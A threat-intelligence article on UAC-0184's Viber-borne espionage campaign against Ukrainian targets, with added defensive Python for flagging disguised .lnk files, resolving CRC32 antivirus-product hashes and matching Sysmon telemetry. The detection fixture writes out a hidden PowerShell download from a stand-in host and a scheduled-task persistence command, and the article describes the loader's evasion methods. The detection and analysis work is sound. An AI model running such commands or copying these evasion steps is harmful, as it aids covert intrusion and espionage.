A Russia-aligned cyber threat actor tracked as UAC-0184 has been observed intensifying its cyber espionage activity against Ukrainian military and government institutions by misusing the Viber messaging platform as an infection vector. According to a recent technical assessment published by the 360 Threat Intelligence Center, the group has sustained high-intensity intelligence collection campaigns throughout 2025, signaling a continued focus on sensitive Ukrainian state- and defense-related targets. The activity highlights how threat actors are increasingly turning to trusted communication platforms to bypass traditional security controls and social engineering defenses.
Also tracked by researchers as Hive0156, the group has a history of using war-related themes to lure victims into opening malicious content. Earlier campaigns relied primarily on phishing emails crafted to appear relevant to ongoing military or political developments. These messages typically delivered Hijack Loader, a modular malware loader that establishes an initial foothold on compromised systems. Once active, Hijack Loader functions as a delivery mechanism for Remcos RAT, a remote administration tool frequently abused in espionage and data theft operations. The group was first publicly documented by CERT-UA in early January 2024, after which further investigations revealed its experimentation with alternative delivery channels, including Signal and Telegram. The most recent findings confirm that the group has further refined this approach by pivoting to Viber, a widely used messaging application.
The latest attack chain begins with malicious ZIP archives sent directly to targets via Viber messages. These archives contain multiple Windows shortcut files that are disguised as official Microsoft Word and Excel documents, making them appear legitimate and relevant to government workflows. When a victim opens one of these files, a decoy document is displayed to reduce suspicion and create the illusion of harmless content. In the background, however, a PowerShell script is triggered that downloads a second ZIP archive named smoothieks.zip from a remote server. This archive is used to reconstruct and deploy Hijack Loader entirely in memory, allowing the malware to evade many traditional file-based detection mechanisms.
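The lure described above, shortcut files inside a ZIP whose names pose as Word or Excel documents, can be flagged before the archive reaches a user by looking at both the file name and the file header. The following Python is an added example for mail or messaging gateway triage; it is not code from the report or from 360 Threat Intelligence Center. It uses the documented Shell Link header (size field 0x4C followed by the LinkCLSID) to recognise .lnk content regardless of name, and treats a .lnk whose stem ends in an Office extension (including names padded with spaces to push the real extension out of view) as a high-severity finding. The archive it scans is constructed inline for the demonstration; the entry names are invented.

```python
import io
import os
import zipfile

# Shell Link header: HeaderSize 0x0000004C, then LinkCLSID
# {00021401-0000-0000-C000-000000000046} serialised little-endian.
LNK_MAGIC = bytes.fromhex("4c000000" "01140200" "0000" "0000" "c000000000000046")

# The lure in this campaign poses as Word and Excel documents.
OFFICE_EXTS = {".doc", ".docx", ".xls", ".xlsx"}


def classify_entry(name: str, head: bytes) -> dict:
    """Return a finding for one archive entry: its name, severity and reasons."""
    reasons = []
    if name.lower().endswith(".lnk"):
        reasons.append("lnk_extension")
        # Drop ".lnk" and any whitespace padding used to hide it, then look
        # at the extension the victim was meant to see.
        decoy_stem = name[:-4].rstrip()
        if os.path.splitext(decoy_stem)[1].lower() in OFFICE_EXTS:
            reasons.append("office_decoy_name")
    if head.startswith(LNK_MAGIC):
        reasons.append("lnk_magic")  # real shortcut content, whatever the name says
    if {"lnk_magic", "office_decoy_name"} <= set(reasons):
        severity = "high"
    elif reasons:
        severity = "medium"
    else:
        severity = "none"
    return {"name": name, "severity": severity, "reasons": reasons}


def inspect_archive(zip_bytes: bytes) -> list:
    """Scan every file in an in-memory ZIP and return the suspicious entries."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(len(LNK_MAGIC))
            result = classify_entry(info.filename, head)
            if result["severity"] != "none":
                findings.append(result)
    return findings


def build_sample_archive() -> bytes:
    """Constructed test archive mimicking the lure; not a real sample."""
    buf = io.BytesIO()
    fake_lnk = LNK_MAGIC + b"\x00" * 60  # header only, no shortcut target
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Order_2025.docx.lnk", fake_lnk)            # Office decoy name
        zf.writestr("Budget_Q3.xlsx              .lnk", fake_lnk)  # padded extension
        zf.writestr("notes.lnk", fake_lnk)                      # shortcut, no decoy
        zf.writestr("readme.txt", b"nothing to see here")       # benign
    return buf.getvalue()


if __name__ == "__main__":
    for finding in inspect_archive(build_sample_archive()):
        print(finding["severity"], finding["name"], ",".join(finding["reasons"]))
```

Checking the header as well as the extension matters: renaming or padding the file name does not change the first 20 bytes, so the two checks disagree only when something is being disguised.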
The deployment process involves a multi-stage execution flow that uses advanced evasion techniques such as DLL side-loading and module stomping. These methods enable the loader to blend into legitimate processes while bypassing static and behavioral security checks. Once active, Hijack Loader performs an environmental scan to identify installed security software. It checks for products associated with vendors such as Kaspersky, Avast, BitDefender, AVG, Emsisoft, Webroot, and Microsoft by calculating CRC32 hashes of program identifiers. This information allows the malware to adapt its behavior and reduce the risk of detection. The loader also establishes persistence on the infected system by creating scheduled tasks, ensuring it can survive reboots and maintain long-term access.
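Comparing CRC32 hashes of program identifiers, rather than the strings themselves, keeps vendor names out of the loader's binary. An analyst who pulls the hash constants out of a sample can recover the names by hashing a candidate list the same way. The Python below is an added example of that lookup, not code from the report; the candidate strings are the vendor names the report lists plus a few analyst-supplied guesses, and the exact identifiers, casing and encoding the loader hashes are assumptions, which is why the table tries several variants of each name.

```python
import zlib

# Candidate identifiers. The vendor names come from the report; the extra
# strings are analyst-supplied guesses and should be extended from analysis.
CANDIDATES = [
    "Kaspersky", "Avast", "BitDefender", "AVG", "Emsisoft", "Webroot", "Microsoft",
    "Kaspersky Lab", "AVAST Software", "Bitdefender", "Emsisoft Anti-Malware",
    "Webroot SecureAnywhere", "Windows Defender", "Microsoft Defender",
]


def crc32_variants(name: str) -> dict:
    """Hash one name the ways a loader plausibly would: as written, lower-cased and
    upper-cased, each as ASCII/UTF-8 bytes and as UTF-16LE (Windows wide strings)."""
    out = {}
    for case_label, text in (("asis", name), ("lower", name.lower()), ("upper", name.upper())):
        out[f"{case_label}_utf8"] = zlib.crc32(text.encode("utf-8")) & 0xFFFFFFFF
        out[f"{case_label}_utf16le"] = zlib.crc32(text.encode("utf-16-le")) & 0xFFFFFFFF
    return out


def build_table(candidates=CANDIDATES) -> dict:
    """Map every candidate hash back to (name, variant) for reverse lookup."""
    table = {}
    for name in candidates:
        for variant, h in crc32_variants(name).items():
            table.setdefault(h, (name, variant))
    return table


def resolve_hashes(hashes, table=None) -> dict:
    """Resolve each 32-bit constant to (name, variant), or None if unknown."""
    table = build_table() if table is None else table
    return {h: table.get(h) for h in hashes}


# Constructed stand-in for constants recovered from a sample: two hashes we can
# resolve and one that no candidate matches.
SAMPLE_HASHES = [
    crc32_variants("Kaspersky")["lower_utf16le"],
    crc32_variants("Webroot")["upper_utf8"],
    0xDEADBEEF,
]

if __name__ == "__main__":
    for h, hit in resolve_hashes(SAMPLE_HASHES).items():
        print(f"0x{h:08x} -> {hit}")
```

Once the matching variant is known (say, lower-cased UTF-16LE), the same table can be regenerated for a much longer list of product, service and driver names in one pass, and the resolved constants become hunting material for the remaining unknown hashes in the sample.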
After completing its preparatory steps, Hijack Loader covertly injects Remcos RAT into a legitimate process named chime.exe. This technique further conceals malicious activity and allows the attackers to remotely control the compromised endpoint. Through Remcos, operators gain extensive capabilities, including executing additional payloads, monitoring user activity, managing files, and exfiltrating sensitive data. Although Remcos is promoted as legitimate system management software, security researchers note that its powerful surveillance features make it a frequent choice for cyber espionage actors. The 360 Threat Intelligence Center emphasized that the tool provides attackers with both automated batch operations and precise manual control through its graphical interface, enabling sustained and flexible intelligence gathering against high-value Ukrainian targets.
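The chain's host-side steps, a PowerShell download launched from a shortcut, scheduled-task creation for persistence, and injection into chime.exe, each leave endpoint telemetry that can be matched independently. The Python below is an added example of such detection logic run over constructed Sysmon-style records; it is not code from the report or from any vendor. The field names follow Sysmon's process-creation (EventID 1) and CreateRemoteThread (EventID 8) events, but the log lines, paths, task name and the location of chime.exe are invented for the example; only the names chime.exe and smoothieks.zip come from the report.

```python
import re

# Constructed Sysmon-style records as key="value" pairs; not output from a real
# host. Paths, task name and chime.exe location are invented for the example.
SAMPLE_EVENTS = [
    'EventID=1 Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'ParentImage="C:\\Windows\\explorer.exe" '
    'CommandLine="powershell -w hidden -c iwr http://example.invalid/smoothieks.zip -o $env:TEMP\\s.zip"',
    'EventID=1 Image="C:\\Windows\\System32\\schtasks.exe" '
    'ParentImage="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="schtasks /create /sc onlogon /tn Updater /tr C:\\Users\\Public\\ldr.exe"',
    'EventID=8 SourceImage="C:\\Users\\Public\\ldr.exe" '
    'TargetImage="C:\\ProgramData\\Chime\\chime.exe" StartAddress="0x00007FF6A1234000"',
    # Benign look-alikes that must not fire:
    'EventID=1 Image="C:\\Windows\\System32\\schtasks.exe" ParentImage="C:\\Windows\\explorer.exe" '
    'CommandLine="schtasks /query /tn Backup"',
    'EventID=8 SourceImage="C:\\Windows\\System32\\csrss.exe" '
    'TargetImage="C:\\Windows\\System32\\svchost.exe" StartAddress="0x00007FF6B0000000"',
]

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_MARKERS = ("iwr", "invoke-webrequest", "downloadfile", "downloadstring", "curl ")
INJECTION_TARGET = "chime.exe"


def parse_event(line: str) -> dict:
    """Turn one key="value" record into a dict (unquoted values allowed)."""
    return {k: (q if q else u) for k, q, u in FIELD_RE.findall(line)}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events) -> list:
    """Return (index, rule_name) for every record that matches a rule."""
    hits = []
    for idx, line in enumerate(events):
        ev = parse_event(line)
        eid = ev.get("EventID")
        if eid == "1":
            image = basename(ev.get("Image", ""))
            parent = basename(ev.get("ParentImage", ""))
            cmd = ev.get("CommandLine", "").lower()
            # Shortcut-launched PowerShell fetching an archive: explorer.exe is the
            # parent because the user double-clicked the disguised .lnk.
            if (image in {"powershell.exe", "pwsh.exe"} and parent == "explorer.exe"
                    and ".zip" in cmd and any(m in cmd for m in DOWNLOAD_MARKERS)):
                hits.append((idx, "powershell_download_from_explorer"))
            # Persistence: a scheduled task created by a script host rather than
            # by an installer or an administrator's console.
            if image == "schtasks.exe" and "/create" in cmd and parent in SCRIPT_HOSTS:
                hits.append((idx, "scheduled_task_from_script_host"))
        elif eid == "8":
            # A thread started in the named host process from another image.
            if basename(ev.get("TargetImage", "")) == INJECTION_TARGET:
                hits.append((idx, "remote_thread_into_chime"))
    return hits


if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event[{idx}] matched {rule}")
```

The three rules are deliberately independent: in-memory staging of Hijack Loader can defeat file scanning, but the shortcut still has to spawn PowerShell, the task still has to be registered, and the RAT still has to be placed into chime.exe, so each stage is a separate opportunity to catch the chain.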